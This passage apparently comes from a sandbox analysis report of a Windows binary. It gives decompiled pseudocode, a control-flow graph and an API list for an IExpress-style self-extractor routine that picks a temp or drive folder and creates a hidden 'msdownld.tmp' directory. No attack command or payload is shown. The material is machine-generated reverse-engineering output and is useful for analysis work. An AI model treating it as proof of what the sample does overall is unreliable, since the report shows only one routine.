                                                                                                                                                                                                                                              control_flow_graph 232 1a55a0-1a55d9 call 1a468f LocalAlloc 235 1a55db-1a55f1 call 1a44b9 call 1a6285 232->235 236 1a55fd-1a560c call 1a468f 232->236 251 1a55f6-1a55f8 235->251 242 1a560e-1a5630 call 1a44b9 LocalFree 236->242 243 1a5632-1a5643 lstrcmpA 236->243 242->251 245 1a564b-1a5659 LocalFree 243->245 246 1a5645 243->246 249 1a565b-1a565d 245->249 250 1a5696-1a569c 245->250 246->245 252 1a5669 249->252 253 1a565f-1a5667 249->253 255 1a589f-1a58b5 call 1a6517 250->255 256 1a56a2-1a56a8 250->256 254 1a58b7-1a58c7 call 1a6ce0 251->254 258 1a566b-1a567a call 1a5467 252->258 253->252 253->258 255->254 256->255 257 1a56ae-1a56c1 GetTempPathA 256->257 261 1a56f3-1a5711 call 1a1781 257->261 262 1a56c3-1a56c9 call 1a5467 257->262 270 1a589b-1a589d 258->270 271 1a5680-1a5691 call 1a44b9 258->271 275 1a586c-1a5890 GetWindowsDirectoryA call 1a597d 261->275 276 1a5717-1a5729 GetDriveTypeA 261->276 269 1a56ce-1a56d0 262->269 269->270 273 1a56d6-1a56df call 1a2630 269->273 270->254 271->251 273->261 288 1a56e1-1a56ed call 1a5467 273->288 275->261 289 1a5896 275->289 280 1a572b-1a572e 276->280 281 1a5730-1a5740 GetFileAttributesA 276->281 280->281 283 1a5742-1a5745 280->283 282 1a577e-1a578f call 1a597d 281->282 281->283 298 1a57b2-1a57bf call 1a2630 282->298 299 1a5791-1a579e call 1a2630 282->299 286 1a576b 283->286 287 1a5747-1a574f 283->287 291 1a5771-1a5779 286->291 287->291 292 1a5751-1a5753 287->292 288->261 288->270 289->270 296 1a5864-1a5866 291->296 292->291 295 1a5755-1a5762 call 1a6952 292->295 295->286 308 1a5764-1a5769 295->308 296->275 296->276 306 1a57d3-1a57f8 call 1a658a GetFileAttributesA 298->306 307 1a57c1-1a57cd GetWindowsDirectoryA 298->307 299->286 309 1a57a0-1a57b0 call 1a597d 299->309 314 1a580a 306->314 315 1a57fa-1a5808 CreateDirectoryA 306->315 307->306 308->282 308->286 309->286 309->298 316 1a580d-1a580f 314->316 315->316 317 1a5811-1a5825 316->317 318 1a5827-1a585c SetFileAttributesA call 1a1781 call 1a5467 316->318 317->296 318->270 323 1a585e 318->323 323->296
                                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                                              			E001A55A0(void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v265;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              				int _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t35;
                                                                                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				int _t40;
                                                                                                                                                                                                                                              				int _t44;
                                                                                                                                                                                                                                              				long _t48;
                                                                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				int _t54;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				char _t60;
                                                                                                                                                                                                                                              				int _t65;
                                                                                                                                                                                                                                              				char _t66;
                                                                                                                                                                                                                                              				int _t67;
                                                                                                                                                                                                                                              				int _t68;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				int _t70;
                                                                                                                                                                                                                                              				int _t71;
                                                                                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                              				int _t73;
                                                                                                                                                                                                                                              				CHAR* _t82;
                                                                                                                                                                                                                                              				CHAR* _t88;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                              				_t2 = E001A468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                              				if(_t109 != 0) {
                                                                                                                                                                                                                                              					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                              					_t32 = E001A468F(_t82, _t109, 1);
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 != 0) {
                                                                                                                                                                                                                                              						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                              						__eflags = _t33;
                                                                                                                                                                                                                                              						if(_t33 == 0) {
                                                                                                                                                                                                                                              							 *0x1a9a30 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						_t35 =  *0x1a8b3e; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t35;
                                                                                                                                                                                                                                              						if(_t35 == 0) {
                                                                                                                                                                                                                                              							__eflags =  *0x1a8a24; // 0x0
                                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                                              								L46:
                                                                                                                                                                                                                                              								_t101 = 0x7d2;
                                                                                                                                                                                                                                              								_t36 = E001A6517(_t82, 0x7d2, 0, E001A3210, 0, 0);
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x1a9a30; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t109 = 0x1a91e4;
                                                                                                                                                                                                                                              									_t40 = GetTempPathA(0x104, 0x1a91e4); // executed
                                                                                                                                                                                                                                              									__eflags = _t40;
                                                                                                                                                                                                                                              									if(_t40 == 0) {
                                                                                                                                                                                                                                              										L19:
                                                                                                                                                                                                                                              										_push(_t82);
                                                                                                                                                                                                                                              										E001A1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                              										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                              										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                              											do {
                                                                                                                                                                                                                                              												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                              												__eflags = _t109 - 6;
                                                                                                                                                                                                                                              												if(_t109 == 6) {
                                                                                                                                                                                                                                              													L22:
                                                                                                                                                                                                                                              													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                              													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                              														goto L30;
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L23;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													__eflags = _t109 - 3;
                                                                                                                                                                                                                                              													if(_t109 != 3) {
                                                                                                                                                                                                                                              														L23:
                                                                                                                                                                                                                                              														__eflags = _t109 - 2;
                                                                                                                                                                                                                                              														if(_t109 != 2) {
                                                                                                                                                                                                                                              															L28:
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															goto L29;
                                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                                              															_t66 = _v268;
                                                                                                                                                                                                                                              															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                              															if(_t66 == 0x41) {
                                                                                                                                                                                                                                              																L29:
                                                                                                                                                                                                                                              																_t60 = _t66 + 1;
                                                                                                                                                                                                                                              																_v268 = _t60;
                                                                                                                                                                                                                                              																goto L42;
                                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                                              																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                              																if(_t66 == 0x42) {
                                                                                                                                                                                                                                              																	goto L29;
                                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                                              																	_t68 = E001A6952( &_v268);
                                                                                                                                                                                                                                              																	__eflags = _t68;
                                                                                                                                                                                                                                              																	if(_t68 == 0) {
                                                                                                                                                                                                                                              																		goto L28;
                                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                                              																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                              																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                              																			L30:
                                                                                                                                                                                                                                              																			_push(0);
                                                                                                                                                                                                                                              																			_t103 = 3;
                                                                                                                                                                                                                                              																			_t49 = E001A597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                              																			__eflags = _t49;
                                                                                                                                                                                                                                              																			if(_t49 != 0) {
                                                                                                                                                                                                                                              																				L33:
                                                                                                                                                                                                                                              																				_t50 = E001A2630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t50;
                                                                                                                                                                                                                                              																				if(_t50 != 0) {
                                                                                                                                                                                                                                              																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				_t88 =  &_v268;
                                                                                                                                                                                                                                              																				E001A658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                              																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                              																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                              																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                              																					__eflags = _t54;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																				__eflags = _t54;
                                                                                                                                                                                                                                              																				if(_t54 != 0) {
                                                                                                                                                                                                                                              																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                              																					_push(_t88);
                                                                                                                                                                                                                                              																					_t109 = 0x1a91e4;
                                                                                                                                                                                                                                              																					E001A1781(0x1a91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                              																					_t101 = 1;
                                                                                                                                                                                                                                              																					_t59 = E001A5467(0x1a91e4, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t59;
                                                                                                                                                                                                                                              																					if(_t59 != 0) {
                                                                                                                                                                                                                                              																						goto L45;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						_t60 = _v268;
                                                                                                                                                                                                                                              																						goto L42;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                              																					_v265 = 0;
                                                                                                                                                                                                                                              																					_v268 = _t60;
                                                                                                                                                                                                                                              																					goto L42;
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                                              																				_t65 = E001A2630(0,  &_v268, 1);
                                                                                                                                                                                                                                              																				__eflags = _t65;
                                                                                                                                                                                                                                              																				if(_t65 != 0) {
                                                                                                                                                                                                                                              																					goto L28;
                                                                                                                                                                                                                                              																				} else {
                                                                                                                                                                                                                                              																					_t67 = E001A597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                              																					__eflags = _t67;
                                                                                                                                                                                                                                              																					if(_t67 == 0) {
                                                                                                                                                                                                                                              																						goto L28;
                                                                                                                                                                                                                                              																					} else {
                                                                                                                                                                                                                                              																						goto L33;
                                                                                                                                                                                                                                              																					}
                                                                                                                                                                                                                                              																				}
                                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                                              																			goto L28;
                                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                                              														goto L22;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L47;
                                                                                                                                                                                                                                              												L42:
                                                                                                                                                                                                                                              												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                              											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										goto L43;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t101 = 1;
                                                                                                                                                                                                                                              										_t69 = E001A5467(0x1a91e4, 1, 3); // executed
                                                                                                                                                                                                                                              										__eflags = _t69;
                                                                                                                                                                                                                                              										if(_t69 != 0) {
                                                                                                                                                                                                                                              											goto L45;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											_t82 = 0x1a91e4;
                                                                                                                                                                                                                                              											_t70 = E001A2630(0, 0x1a91e4, 1);
                                                                                                                                                                                                                                              											__eflags = _t70;
                                                                                                                                                                                                                                              											if(_t70 != 0) {
                                                                                                                                                                                                                                              												goto L19;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t101 = 1;
                                                                                                                                                                                                                                              												_t82 = 0x1a91e4;
                                                                                                                                                                                                                                              												_t71 = E001A5467(0x1a91e4, 1, 1);
                                                                                                                                                                                                                                              												__eflags = _t71;
                                                                                                                                                                                                                                              												if(_t71 != 0) {
                                                                                                                                                                                                                                              													goto L45;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													do {
                                                                                                                                                                                                                                              														goto L19;
                                                                                                                                                                                                                                              														L43:
                                                                                                                                                                                                                                              														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                              														_push(4);
                                                                                                                                                                                                                                              														_t101 = 3;
                                                                                                                                                                                                                                              														_t82 =  &_v268;
                                                                                                                                                                                                                                              														_t44 = E001A597D(_t82, _t101, 1);
                                                                                                                                                                                                                                              														__eflags = _t44;
                                                                                                                                                                                                                                              													} while (_t44 != 0);
                                                                                                                                                                                                                                              													goto L2;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                              							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								_t72 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								__eflags =  *0x1a8b3f - _t35; // 0x0
                                                                                                                                                                                                                                              								_t72 = 0;
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									goto L10;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t101 = 0;
                                                                                                                                                                                                                                              							_t73 = E001A5467(0x1a8b3e, 0, _t72);
                                                                                                                                                                                                                                              							__eflags = _t73;
                                                                                                                                                                                                                                              							if(_t73 != 0) {
                                                                                                                                                                                                                                              								L45:
                                                                                                                                                                                                                                              								_t38 = 1;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t101 = 0x4be;
                                                                                                                                                                                                                                              								E001A44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              								goto L2;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t101 = 0x4b1;
                                                                                                                                                                                                                                              						E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						LocalFree(_t109);
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t101 = 0x4b5;
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                                                              					_t38 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L47:
                                                                                                                                                                                                                                              				return E001A6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x001a55ab
                                                                                                                                                                                                                                              0x001a55b2
                                                                                                                                                                                                                                              0x001a55c9
                                                                                                                                                                                                                                              0x001a55d5
                                                                                                                                                                                                                                              0x001a55d9
                                                                                                                                                                                                                                              0x001a5600
                                                                                                                                                                                                                                              0x001a5605
                                                                                                                                                                                                                                              0x001a560a
                                                                                                                                                                                                                                              0x001a560c
                                                                                                                                                                                                                                              0x001a5638
                                                                                                                                                                                                                                              0x001a5641
                                                                                                                                                                                                                                              0x001a5643
                                                                                                                                                                                                                                              0x001a5645
                                                                                                                                                                                                                                              0x001a5645
                                                                                                                                                                                                                                              0x001a564c
                                                                                                                                                                                                                                              0x001a5652
                                                                                                                                                                                                                                              0x001a5657
                                                                                                                                                                                                                                              0x001a5659
                                                                                                                                                                                                                                              0x001a5696
                                                                                                                                                                                                                                              0x001a569c
                                                                                                                                                                                                                                              0x001a589f
                                                                                                                                                                                                                                              0x001a58a7
                                                                                                                                                                                                                                              0x001a58ac
                                                                                                                                                                                                                                              0x001a58b3
                                                                                                                                                                                                                                              0x001a58b5
                                                                                                                                                                                                                                              0x001a56a2
                                                                                                                                                                                                                                              0x001a56a2
                                                                                                                                                                                                                                              0x001a56a8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56ae
                                                                                                                                                                                                                                              0x001a56ae
                                                                                                                                                                                                                                              0x001a56b9
                                                                                                                                                                                                                                              0x001a56bf
                                                                                                                                                                                                                                              0x001a56c1
                                                                                                                                                                                                                                              0x001a56f3
                                                                                                                                                                                                                                              0x001a56f3
                                                                                                                                                                                                                                              0x001a5705
                                                                                                                                                                                                                                              0x001a570a
                                                                                                                                                                                                                                              0x001a5711
                                                                                                                                                                                                                                              0x001a5717
                                                                                                                                                                                                                                              0x001a5724
                                                                                                                                                                                                                                              0x001a5726
                                                                                                                                                                                                                                              0x001a5729
                                                                                                                                                                                                                                              0x001a5730
                                                                                                                                                                                                                                              0x001a5737
                                                                                                                                                                                                                                              0x001a573d
                                                                                                                                                                                                                                              0x001a5740
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a572b
                                                                                                                                                                                                                                              0x001a572b
                                                                                                                                                                                                                                              0x001a572e
                                                                                                                                                                                                                                              0x001a5742
                                                                                                                                                                                                                                              0x001a5742
                                                                                                                                                                                                                                              0x001a5745
                                                                                                                                                                                                                                              0x001a576b
                                                                                                                                                                                                                                              0x001a576b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5747
                                                                                                                                                                                                                                              0x001a5747
                                                                                                                                                                                                                                              0x001a574d
                                                                                                                                                                                                                                              0x001a574f
                                                                                                                                                                                                                                              0x001a5771
                                                                                                                                                                                                                                              0x001a5771
                                                                                                                                                                                                                                              0x001a5773
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5751
                                                                                                                                                                                                                                              0x001a5751
                                                                                                                                                                                                                                              0x001a5753
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5755
                                                                                                                                                                                                                                              0x001a575b
                                                                                                                                                                                                                                              0x001a5760
                                                                                                                                                                                                                                              0x001a5762
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5764
                                                                                                                                                                                                                                              0x001a5764
                                                                                                                                                                                                                                              0x001a5769
                                                                                                                                                                                                                                              0x001a577e
                                                                                                                                                                                                                                              0x001a577e
                                                                                                                                                                                                                                              0x001a5781
                                                                                                                                                                                                                                              0x001a5788
                                                                                                                                                                                                                                              0x001a578d
                                                                                                                                                                                                                                              0x001a578f
                                                                                                                                                                                                                                              0x001a57b2
                                                                                                                                                                                                                                              0x001a57b8
                                                                                                                                                                                                                                              0x001a57bd
                                                                                                                                                                                                                                              0x001a57bf
                                                                                                                                                                                                                                              0x001a57cd
                                                                                                                                                                                                                                              0x001a57cd
                                                                                                                                                                                                                                              0x001a57dd
                                                                                                                                                                                                                                              0x001a57e3
                                                                                                                                                                                                                                              0x001a57ef
                                                                                                                                                                                                                                              0x001a57f5
                                                                                                                                                                                                                                              0x001a57f8
                                                                                                                                                                                                                                              0x001a580a
                                                                                                                                                                                                                                              0x001a580a
                                                                                                                                                                                                                                              0x001a57fa
                                                                                                                                                                                                                                              0x001a5802
                                                                                                                                                                                                                                              0x001a5802
                                                                                                                                                                                                                                              0x001a580d
                                                                                                                                                                                                                                              0x001a580f
                                                                                                                                                                                                                                              0x001a5830
                                                                                                                                                                                                                                              0x001a5836
                                                                                                                                                                                                                                              0x001a583d
                                                                                                                                                                                                                                              0x001a584b
                                                                                                                                                                                                                                              0x001a5851
                                                                                                                                                                                                                                              0x001a5855
                                                                                                                                                                                                                                              0x001a585a
                                                                                                                                                                                                                                              0x001a585c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a585e
                                                                                                                                                                                                                                              0x001a585e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a585e
                                                                                                                                                                                                                                              0x001a5811
                                                                                                                                                                                                                                              0x001a5817
                                                                                                                                                                                                                                              0x001a5819
                                                                                                                                                                                                                                              0x001a581f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a581f
                                                                                                                                                                                                                                              0x001a5791
                                                                                                                                                                                                                                              0x001a5797
                                                                                                                                                                                                                                              0x001a579c
                                                                                                                                                                                                                                              0x001a579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a57a0
                                                                                                                                                                                                                                              0x001a57a9
                                                                                                                                                                                                                                              0x001a57ae
                                                                                                                                                                                                                                              0x001a57b0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a57b0
                                                                                                                                                                                                                                              0x001a579e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5769
                                                                                                                                                                                                                                              0x001a5762
                                                                                                                                                                                                                                              0x001a5753
                                                                                                                                                                                                                                              0x001a574f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a572e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5864
                                                                                                                                                                                                                                              0x001a5864
                                                                                                                                                                                                                                              0x001a5864
                                                                                                                                                                                                                                              0x001a5717
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56c3
                                                                                                                                                                                                                                              0x001a56c5
                                                                                                                                                                                                                                              0x001a56c9
                                                                                                                                                                                                                                              0x001a56ce
                                                                                                                                                                                                                                              0x001a56d0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56d6
                                                                                                                                                                                                                                              0x001a56d6
                                                                                                                                                                                                                                              0x001a56d8
                                                                                                                                                                                                                                              0x001a56dd
                                                                                                                                                                                                                                              0x001a56df
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56e1
                                                                                                                                                                                                                                              0x001a56e2
                                                                                                                                                                                                                                              0x001a56e4
                                                                                                                                                                                                                                              0x001a56e6
                                                                                                                                                                                                                                              0x001a56eb
                                                                                                                                                                                                                                              0x001a56ed
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a56f3
                                                                                                                                                                                                                                              0x001a56f3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a586c
                                                                                                                                                                                                                                              0x001a5878
                                                                                                                                                                                                                                              0x001a587e
                                                                                                                                                                                                                                              0x001a5882
                                                                                                                                                                                                                                              0x001a5883
                                                                                                                                                                                                                                              0x001a5889
                                                                                                                                                                                                                                              0x001a588e
                                                                                                                                                                                                                                              0x001a588e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5896
                                                                                                                                                                                                                                              0x001a56ed
                                                                                                                                                                                                                                              0x001a56df
                                                                                                                                                                                                                                              0x001a56d0
                                                                                                                                                                                                                                              0x001a56c1
                                                                                                                                                                                                                                              0x001a56a8
                                                                                                                                                                                                                                              0x001a565b
                                                                                                                                                                                                                                              0x001a565b
                                                                                                                                                                                                                                              0x001a565d
                                                                                                                                                                                                                                              0x001a5669
                                                                                                                                                                                                                                              0x001a5669
                                                                                                                                                                                                                                              0x001a565f
                                                                                                                                                                                                                                              0x001a565f
                                                                                                                                                                                                                                              0x001a5665
                                                                                                                                                                                                                                              0x001a5667
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5667
                                                                                                                                                                                                                                              0x001a566c
                                                                                                                                                                                                                                              0x001a5673
                                                                                                                                                                                                                                              0x001a5678
                                                                                                                                                                                                                                              0x001a567a
                                                                                                                                                                                                                                              0x001a589b
                                                                                                                                                                                                                                              0x001a589b
                                                                                                                                                                                                                                              0x001a5680
                                                                                                                                                                                                                                              0x001a5685
                                                                                                                                                                                                                                              0x001a568c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a568c
                                                                                                                                                                                                                                              0x001a567a
                                                                                                                                                                                                                                              0x001a560e
                                                                                                                                                                                                                                              0x001a5613
                                                                                                                                                                                                                                              0x001a561a
                                                                                                                                                                                                                                              0x001a5620
                                                                                                                                                                                                                                              0x001a5626
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5626
                                                                                                                                                                                                                                              0x001a55db
                                                                                                                                                                                                                                              0x001a55e0
                                                                                                                                                                                                                                              0x001a55e7
                                                                                                                                                                                                                                              0x001a55f1
                                                                                                                                                                                                                                              0x001a55f6
                                                                                                                                                                                                                                              0x001a55f6
                                                                                                                                                                                                                                              0x001a55f6
                                                                                                                                                                                                                                              0x001a58b7
                                                                                                                                                                                                                                              0x001a58c7

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001A55CF
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 001A5638
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 001A564C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001A5620
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              • GetTempPathA.KERNELBASE(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A56B9
                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 001A571E
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 001A5737
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001A57CD
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001A57EF
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 001A5802
                                                                                                                                                                                                                                                • Part of subcall function 001A2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 001A2654
